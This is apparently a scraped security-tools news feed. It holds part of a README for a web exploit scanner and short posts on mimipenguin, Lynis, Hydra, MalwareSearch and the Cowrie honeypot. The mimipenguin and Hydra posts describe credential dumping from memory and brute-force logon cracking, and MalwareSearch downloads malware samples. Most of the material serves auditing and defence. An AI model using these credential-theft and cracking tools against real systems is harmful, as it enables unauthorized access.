The snapshot stores each file path together with a SHA-256 hash of the file contents. A hash, or digest, is a small summary of a message, which in this case is the file's contents. If the file contents change, even in a very small way, the hash will become completely different. This provides a good way of detecting any changes to file contents.

Usage
The following two utilities are also installed as part of Web Exploit Detector: -
  • wed-generate-snapshot: this utility allows a snapshot to be generated for all files (recursively) in a directory specified by "--webroot". The snapshot will be saved to a file specified in the "--output" option.
  • wed-compare-snapshot: once a snapshot has been generated it can be compared against the current contents of the same directory. The snapshot to check is specified using the "--snapshot" option. The base directory to check against is stored within the snapshot, but if the base directory has changed since the snapshot was generated then the --webroot option can be used.

Workflow
Snapshots can be generated as frequently as required, but as a general rule of thumb they should be generated whenever a site is in a clean (non-infected) state and whenever a legitimate change has been made. For CMS-based sites like WordPress, snapshots should be created regularly as new uploads will cause the new state to change from the stored snapshot. For sites whose files should never change, a single snapshot can be generated and then used indefinitely ensure nothing actually does change.

Usage as a module
The src/web-exploit-detector.js script is an ES6 module that exports the set of rules as rules as well as a number of functions: -
  • executeTests(settings): runs the exploit checker based on the passed settings object. For usage, please consult the index.js script.
  • formatResult(result): takes a single test result from the array returned from executeTests() and generates a string of results ready for output for that test.
  • getFileList(path): returns an array of files from the base path using readDirRecursive().
  • processRulesOnFile(file, rules): processes all rules from the array rules on a single file (string path).
  • readDirRecursive(path): recursive function which returns a Promise which will be resolved with an array of all files in path and sub-directories.
The src/cli.js script is a simple command-line interface (CLI) to this module as used by the wed-scanner script, so reading this script shows one way in which this module can be used.
The project uses Babel to compile the ES6 modules in "src" to plain JavaScript modules in "lib". If you are running an older version of Node.js then modules can be require()'d from the "lib" directory instead.

Building
The package contains Babel as a dev-dependency and the "build" and "watch:build" scripts. When running the "build" script (npm run build), the ES6 modules in "./src" will be compiled and saved to "./lib", where they are included by the CLI scripts.
The "./lib" directory is included in the repository so that any user can clone the repository and run the application directly without having to install dev-dependencies and build the application.

Excluding results per rule
Sometimes rules, especially those tagged with suspicion, will identify a clean file as a potential exploit. Because of this, a system to allow files to be excluded from being checked for a rule is also included.
The wed-results-to-exceptions script takes an output file from the main detector script (see the --output option) and gives you the choice to exclude each file in turn for each specific rule. All excluded files are stored in a file called wed-exceptions.json (in the user's home directory) which is read by the main script before running the scan. If a file is listed in this file then all attached rules (by ID) will be skipped when checking this file.
For usage instructions, simply run wed-results-to-exceptions. You will need to have a valid output JSON from a previous run of the main detector first using the --output option.
For users working directly with the Git repository, run node results_to_exceptions.js in the project root directory.

Rule engine
The application operates using a collection of "rules" which are loaded when the application is run. Each rule consists of an ID, name, description, list of URLs, tags, deprecation flag and most importantly a set of tests.
Each individual test must be one of the following: -
  • A regular expression: the simplest type of test, any value matching the regex will pass the test.
  • A Boolean callback: the callback function must return a Boolean value indicating if the value passes the test. The callback is free to perform any synchronous operations.
  • A Promise callback: the callback function must return a Promise which is resolved with a Boolean value indicating if the value passes the test. This type of callback is free to perform any asynchronous operations.
The following test types are supported: -
  • "path": used to check the file path. This test must exist and should evaluate to true if the file path is considered to match the rule.
  • "content": used to check the contents of a file. This test is optional and file contents will only be read and sent to rules that implement this test type. When this test is a function, the content (string) will be passed as the first argument and the file path will be passed as the second argument, allowing the test to perform additional file operations.

Expanding on the rules
As web-based exploits are constantly evolving and new exploits are being created, the set of rules need to be updated too. As I host a number of websites I am constantly observing new kinds of exploits, so I will be adding to the set of rules whenever I can. I run this tool on my own servers, so of course I want it to be as functional as possible!
This brings me onto the reasons why I have made this application available as an open-source project: firstly so that you and others can benefit from it and secondly so that we can all collaborate to contribute detection rules so that the application is always up to date.

Contributing rules
If you have discovered an exploit that is not detected by this tool then please either contact me to let me know or even better, write your own rule and add it to the third-party rule-set (rules/third-party/index.js), then send me a pull request.
Don't worry if you don't know how to write your own rules; the most important thing is that the rule gets added, so feel free to send me as much information as you can about the exploit and I will try to create my own rule for it.
Rules are categorised, but the simplest way to add your own rule is to add it to the third-party rule-set mentioned above. Rule IDs are written in the following format: "author:type:sub-type(s):rule-id". For example, one of my own rules is "P64:php:cms:wordpress:wso_webshell". "P64" is me (the author), "php:cms:wordpress" is the grouping (a PHP-specific rule, for the Content Management System (CMS) called WordPress) and "wso_webshell" is the specific rule ID. When writing your own rules, try to follow this format, and replace "P64" with your own GitHub username or other unique ID.

Unit tests and linting
The project contains a set of Jasmine tests which can be run using npm test. It also contains an ESLint configuration, and ESLint can be run using npm run lint.
When developing, tests can also be run whenever a source file changes by running npm run watch:test. To run tests and ESLint, the npm run watch:all script can be used.
Please note that unless you already have Jasmine and/or nodemon installed, you should run npm install in non-production mode to ensure that the dev-dependencies are installed.


Search

mimipenguin - A Tool To Dump The Login Password From The Current Linux User

May 4, 2017, 7:30 am
$
0
0

A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz.

Details
Takes advantage of cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. Will attempt to calculate each word's probability by checking hashes in /etc/shadow, hashes in memory, and regex searches.

Requires
  • root permissions

Supported/Tested Systems
  • Kali 4.3.0 (rolling) x64 (gdm3)
  • Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
  • Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
  • XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2)
  • Archlinux x64 Gnome 3 (Gnome Keyring 3.20)
  • VSFTPd 3.0.3-8+b1 (Active FTP client connections)
  • Apache2 2.4.25-3 (Active/Old HTTP BASIC AUTH Sessions) [Gcore dependency]
  • openssh-server 1:7.3p1-1 (Active SSH connections - sudo usage)

Notes
  • Password moves in memory - still honing in on 100% effectiveness
  • Plan on expanding support and other credential locations
  • Working on expanding to non-desktop environments
  • Known bug - sometimes gcore hangs the script, this is a problem with gcore
  • Open to pull requests and community research
  • LDAP research (nscld winbind etc) planned for future

Development Roadmap
MimiPenguin is slowly being ported to multiple languages to support all possible post-exploit scenarios. The roadmap below was suggested by KINGSABRI to track the various versions and features. An "X" denotes full support while a "~" denotes a feature with known bugs.

Feature.sh.py
GDM password (Kali Desktop, Debian Desktop)~X
Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop)XX
VSFTPd (Active FTP Connections)XX
Apache2 (Active HTTP Basic Auth Sessions)~~
OpenSSH (Active SSH Sessions - Sudo Usage)~~



Lynis 2.5.0 - Security Auditing Tool for Unix/Linux Systems

May 5, 2017, 7:35 am
$
0
0

We are excited to announce this major release of auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next of simplification improvements we made. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool. Used by system administrators, security professionals, and auditors, to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix based systems and versions, including:
  • AIX
  • FreeBSD
  • HP-UX
  • Linux
  • Mac OS
  • NetBSD
  • OpenBSD
  • Solaris
  • and others
It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional

Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). 

How it works

Lynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report.

Steps
  1. Determine operating system
  2. Search for available tools and utilities
  3. Check for Lynis update
  4. Run tests from enabled plugins
  5. Run security tests per category
  6. Report status of security scan
Besides the data displayed on screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.

Opportunistic scanning

Lynis scanning is opportunistic: it uses what it can find.
For example if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers a SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates, so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
  • Security auditing
  • Compliance testing (e.g. PCI, HIPAA, SOx)
  • Vulnerability detection and scanning
  • System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
  • Best practices
  • CIS
  • NIST
  • NSA
  • OpenSCAP data
  • Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Lynis Plugins

lugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.

Changelog
Upgrade note
During the development of this release, the project got informed about a flaw
that possibly could be abused by a local attacker. Even with the small risk of
success, upgrading is highly recommended. See details on
[CVE-2017-8108](https://cisofy.com/security/cve/cve-2017-8108/)

This release is a special maintenance release with focus on cleaning up the code
for readability and future expansion.

Changes:
--------
* Use ROOTDIR variable instead of fixed paths
* Introduction of IsEmpty and HasData functions for readability of code
* Renamed some variables to better indicate their purpose (counting, data type)
* Removal of unused code and comments
* Deleted unused tests from database file
* Correct levels of identation
* Support for older mac OS X versions (Lion and Mountain Lion)
* Initialized variables for more binaries
* Additional sysctls are tested

Tests:
------
* MALW-3280 - Extended test with Symantec components
* PKGS-7332 - Detection of macOS ports tool and installed packages
* TOOL-5120 - Snort detection
* TOOL-5122 - Snort configuration file


Hydra 8.5 - Network Logon Cracker

May 6, 2017, 6:39 am
$
0
0
 A very fast network logon cracker which support many different services.

See feature sets and services coverage page - incl. a speed comparison against ncrack and medusa.Number one of the biggest security holes are passwords, as every password security study shows.

This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system.

There are already several login hacker tools available, however none does either support more than one protocol to attack or support parallized connects.

It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and OSX.

Currently this tool supports the following protocols:
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

CHANGELOG for 8.5
CHANGELOG for 8.5
        ===================
        ! Development moved to a public github repository: https://github.com/vanhauser-thc/thc-hydra

        ! Reports came in that the rdp module is not working reliable sometimes, most likely against new Windows versions. please test, report and if possible send a fix
        * New command line option:
          -b : format option for -o output file (json only so far, happy for patches supporting others :) ) - thanks to veggiespam for the patch
        * ./configure now honors the CC enviroment variable if present
        * Fix for the restore file crash on some x64 platforms (finally! thanks to lukas227!)
        * Changed the format of the restore file to detect cross platform copies
        * Fixed a bug in the NCP module
        * Favor strrchr() over rindex()
        * Added refactoring patch by diadlo
        * Updated man page with missing command line options


MalwareSearch - A Command Line Tool To Find Malwares

May 7, 2017, 10:37 am
$
0
0

Tool developed for searching malwares at openmalware.org by command line, allowing specific malware download by shell. Soon we'll input more sources like MalShare, MalwareBlacklist, Malware.lu's AVCaesar and Malwr.

Usage
Optional Arguments:
$ malwaresearch.py [--h HELP] [-f FIND] [-w WRITE] 
usage: malwaresearch.py [-h] [-f Sample | -d Hash] [-w File] [-o Int]

MalwareSearch 0.1 [github.com/MalwareReverseBrasil/malwaresearch.git]

optional arguments:
  -h, --help            show this help message and exit
  -f Sample, --find Sample
                        Enter your search via MD5, SHA1, SHA256 or an Common
                        Signature name.
  -d Hash, --download Hash
                        Download selected sample
  -w File, --write File
                        Save the output results.
  -o Int, --output Int  Show number of results


Developers:
  • Ialle Teixeira, Security/Malware Researcher blog,
  • Vandré Augusto, Electric Engineer & Malware Researcher blog.

Cowrie - SSH/Telnet Honeypot

May 8, 2017, 7:30 am
$
0
0

Cowrie is a medium interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by the attacker.

Cowrie is developed by Michel Oosterhof.

Features
Some interesting features:
  • Fake filesystem with the ability to add/remove files. A full fake filesystem resembling a Debian 5.0 installation is included
  • Possibility of adding fake file contents so the attacker can cat files such as /etc/passwd. Only minimal file contents are included
  • Session logs stored in an UML Compatible format for easy replay with original timings
  • Cowrie saves files downloaded with wget/curl or uploaded with SFTP and scp for later inspection
Additional functionality over standard kippo:
  • SFTP and SCP support for file upload
  • Support for SSH exec commands
  • Logging of direct-tcp connection attempts (ssh proxying)
  • Forward SMTP connections to SMTP Honeypot (e.g. mailoney)
  • Logging in JSON format for easy processing in log management solutions
  • Many, many additional commands

Requirements
Software required:
  • Python 2.7+, (Python 3 not yet supported due to Twisted dependencies)
  • python-virtualenv
For Python dependencies, see requirements.txt

Files of interest:
  • cowrie.cfg - Cowrie's configuration file. Default values can be found in cowrie.cfg.dist
  • data/fs.pickle - fake filesystem
  • data/userdb.txt - credentials allowed or disallowed to access the honeypot
  • dl/ - files transferred from the attacker to the honeypot are stored here
  • honeyfs/ - file contents for the fake filesystem - feel free to copy a real system here or use bin/fsctl
  • log/cowrie.json - transaction output in JSON format
  • log/cowrie.log - log/debug output
  • log/tty/*.log - session logs
  • txtcmds/ - file contents for the fake commands
  • bin/createfs - used to create the fake filesystem
  • bin/playlog - utility to replay session logs

    Read more.

    Viewing all 5816 articles
    Browse latest View live
    Search
    <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>